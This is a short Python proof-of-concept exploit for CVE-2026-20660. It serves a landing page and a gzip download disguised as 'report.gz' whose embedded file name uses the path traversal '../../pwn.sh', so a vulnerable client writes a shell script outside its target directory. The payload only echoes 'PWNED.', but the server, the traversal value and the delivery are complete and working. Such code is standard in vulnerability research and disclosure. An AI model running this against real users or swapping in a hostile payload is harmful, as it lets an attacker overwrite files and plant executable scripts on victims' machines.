#!/usr/bin/env python3 """ CVE-2026-20660 PoC variant: write ../../pwn.sh via gzip FNAME. """ import argparse import http.server import sys from datetime import datetime from server import make_gzip_with_fname PAYLOAD = b'#!/bin/sh\n\necho "PWNED."\n' FNAME = "../../pwn.sh" LANDING = b"""\ Overwrite PoC

CVE-2026-20660 - overwrite ~/pwn.sh

FNAME: ../../pwn.sh
Payload: #!/bin/sh; echo "PWNED."

Trigger """ class Handler(http.server.BaseHTTPRequestHandler): def do_GET(self): if self.path == "/": self.send_response(200) self.send_header("Content-Type", "text/html; charset=utf-8") self.send_header("Content-Length", str(len(LANDING))) self.end_headers() self.wfile.write(LANDING) return if self.path.startswith("/download"): gz_data = make_gzip_with_fname(PAYLOAD, FNAME) print(f"\nTRIGGERED: FNAME={FNAME}, size={len(gz_data)}, client={self.client_address[0]}") self.send_response(200) self.send_header("Content-Type", "application/gzip") self.send_header("Content-Disposition", 'attachment; filename="report.gz"') self.send_header("Content-Length", str(len(gz_data))) self.send_header("Cache-Control", "no-store") self.end_headers() self.wfile.write(gz_data) return self.send_error(404) def log_message(self, fmt, *args): sys.stderr.write(f"[{datetime.now():%H:%M:%S}] {fmt % args}\n") def main(): parser = argparse.ArgumentParser() parser.add_argument("--port", "-p", type=int, default=9999) parser.add_argument("--bind", "-b", default="0.0.0.0") args = parser.parse_args() server = http.server.HTTPServer((args.bind, args.port), Handler) print(f"\nOverwrite PoC on http://{args.bind}:{args.port}/") print(f"FNAME: {FNAME}") print("Target: ~/pwn.sh") try: server.serve_forever() except KeyboardInterrupt: server.server_close() if __name__ == "__main__": main()